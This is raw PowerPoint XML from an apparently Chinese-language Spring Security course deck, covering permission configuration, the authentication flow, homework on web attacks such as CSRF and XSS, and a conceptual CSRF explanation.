              </a:rPr>
              <a:t>一路有你</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286955081"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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4 3.7037E-6 L -0.04453 3.7037E-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2 3.7037E-6 L -3.75E-6 3.7037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xmlns="" id="{F9CA2185-5D48-4E52-A6FE-D3D06D08CECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="653143" y="551543"/>
            <a:ext cx="5239656" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="5239656" cy="740228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xmlns="" id="{75DC2774-D70F-4DC5-BEAB-8A272991CD4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="41510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Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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权限管理</a:t>
              </a:r>
              <a:endPara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xmlns="" id="{B957EB1E-B9D5-400D-A715-D9FB3989FB91}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228"/>
            </a:xfrm>
          </p:grpSpPr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xmlns="" id="{A7421970-C6F3-4F6C-BD69-8917DD8AAAD8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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xmlns="" id="{226DB341-6F4A-4713-B8F3-143910E7D96D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6444343" y="1132114"/>
                <a:ext cx="4354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>
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1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43" y="1582056"/>
            <a:ext cx="7170057" cy="3349411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="直接箭头连接符 33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7300686" y="2433022"/>
            <a:ext cx="1080208" cy="36270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8380894" y="2266533"/>
            <a:ext cx="1823561" cy="43088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配置资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(URL)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>授权开启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36" name="直接箭头连接符 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7300686" y="3096211"/>
            <a:ext cx="1147542" cy="321817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8448228" y="2872227"/>
            <a:ext cx="1823561" cy="26161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配置认证跳过静态资源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38" name="直接箭头连接符 37"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="39" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6844200" y="5307848"/>
            <a:ext cx="624912" cy="426011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7469112" y="5177043"/>
            <a:ext cx="2393657" cy="26161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配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AuthenticationManagerBuilder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40" name="直接箭头连接符 39"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="41" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5718629" y="3759399"/>
            <a:ext cx="2320580" cy="624097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8039209" y="3543955"/>
            <a:ext cx="1823561" cy="43088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配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UserDetailsManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数据存储用户及权限信息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028" y="5782432"/>
            <a:ext cx="6037943" cy="80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413451"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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906" y="2177840"/>
            <a:ext cx="6438095" cy="1819048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653143" y="551543"/>
            <a:ext cx="5226956" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="5226956" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="41383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Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty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权限管理</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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>
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1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326" y="4448751"/>
            <a:ext cx="6895238" cy="1790476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="60" name="直接箭头连接符 59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3270802" y="1640191"/>
            <a:ext cx="540104" cy="387235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3810906" y="1572198"/>
            <a:ext cx="1208429" cy="26161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初始化用户信息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62" name="直接箭头连接符 61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6715460" y="1648976"/>
            <a:ext cx="1080208" cy="536244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7748910" y="1451413"/>
            <a:ext cx="1208429" cy="43088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初始化用户和用户组信息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64" name="直接箭头连接符 63"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7272916" y="4723339"/>
            <a:ext cx="1080208" cy="536244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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8353124" y="4535458"/>
            <a:ext cx="1208429" cy="43088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初始化用户组合权限信息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904" y="1527765"/>
            <a:ext cx="3047619" cy="1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092513"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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53143" y="551543"/>
            <a:ext cx="5226956" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="5226956" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="41383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Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty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权限管理</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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>
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1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18" name="直接箭头连接符 17"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4241552" y="1895090"/>
            <a:ext cx="495548" cy="171795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4737100" y="1679646"/>
            <a:ext cx="1208429" cy="43088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访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manger/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>**需要认证和授权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52" y="1679646"/>
            <a:ext cx="3800000" cy="7619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52" y="2937930"/>
            <a:ext cx="4181248" cy="151977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1853698" y="2544832"/>
            <a:ext cx="1451250" cy="26161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跳转到认证登录页面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>
            <a:off x="1741714" y="2492597"/>
            <a:ext cx="0" cy="44533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243" y="1655325"/>
            <a:ext cx="3248257" cy="1456175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="35" name="直接箭头连接符 34"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4622800" y="2383413"/>
            <a:ext cx="1971443" cy="149008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4836736" y="2580617"/>
            <a:ext cx="1086227" cy="26929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认证错误信息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2963" y="3567747"/>
            <a:ext cx="4895042" cy="1157267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="直接箭头连接符 41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4672430" y="4146381"/>
            <a:ext cx="1250533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4737100" y="4271054"/>
            <a:ext cx="1026011" cy="43088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认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>授权成功信息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3698" y="5328745"/>
            <a:ext cx="4158996" cy="1415148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="直接箭头连接符 47"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="39" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717800" y="4486497"/>
            <a:ext cx="1215396" cy="84224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1238055" y="4701941"/>
            <a:ext cx="1708958" cy="43088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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通过认证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>授权后成功访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manager/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>createuser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991946"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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椭圆 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2931886" y="2786743"/>
            <a:ext cx="1567543" cy="1567543"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="56F2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902857" y="3207657"/>
            <a:ext cx="15530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目录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5936343" y="3207657"/>
            <a:ext cx="740228" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="740228" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="45C1A4">
                <a:alpha val="55000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="215900">
                <a:srgbClr val="7A9A92">
                  <a:alpha val="5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6444343" y="1132114"/>
              <a:ext cx="4354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  <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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44192AA8-6EE0-4E55-8A69-BE83B2761E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6313714" y="3161649"/>
            <a:ext cx="3156028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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0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安全策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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CC1F883B-4400-4D47-A931-29527A2AD0CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6749142" y="3684869"/>
            <a:ext cx="4681656" cy="132343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作业</a:t>
            </a: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2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：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CSRF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攻击、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XSS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攻击、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HTTP Strict Transport Security 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HSTS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）攻击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X-Frame-Options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挟持攻击、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Session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固定攻击的例子与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SPRING </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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secuity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的应对之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策</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean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作业</a:t>
            </a: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3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：</a:t>
            </a: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X-Content-Type-Options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这个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Header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的作用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345971774"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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758 0.00046 L 0.04453 2.22222E-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9" y="-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1784 0.00092 L -2.08333E-7 2.22222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" y="-4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758 0.00046 L 0.04453 2.22222E-6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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6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" y="-4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758 0.00046 L 0.04453 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="75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9" y="-2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1784 0.00092 L -2.08333E-7 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="25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9" grpId="2"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="10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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="653143" y="1538230"/>
            <a:ext cx="4616735" cy="3216265"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="3216265"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Cross-site request forgery</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>）</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4324636" cy="2554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CSRF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中文名称：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>跨站请求</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>伪造。主要目的：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攻击者盗用了你的身份，以你的名义发送恶意请求。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CSRF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能够做的事情包括：以你名义发送邮件，发消息，盗取你的账号，甚至于购买商品，虚拟货币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转账等。造成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的问题包括：个人隐私泄露以及财产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安全。                                完成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CSRF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攻击，需要受害者完成两个步骤：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
                <a:t> 　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1.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登录受信任网站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A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，并在本地生成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Cookie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。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2.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在不登出</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>A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</a:rPr>
                <a:t>的情况下，访问危险网站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</a:rPr>
                <a:t>B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</a:rPr>
                <a:t>。            </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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此时危险网站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B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发出恶意请求攻击网站</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5269878" y="1538230"/>
            <a:ext cx="6623958" cy="4201150"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="4201150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="5662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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSRF</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>示例</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657" cy="35394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</a:rPr>
                <a:t>      银行</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
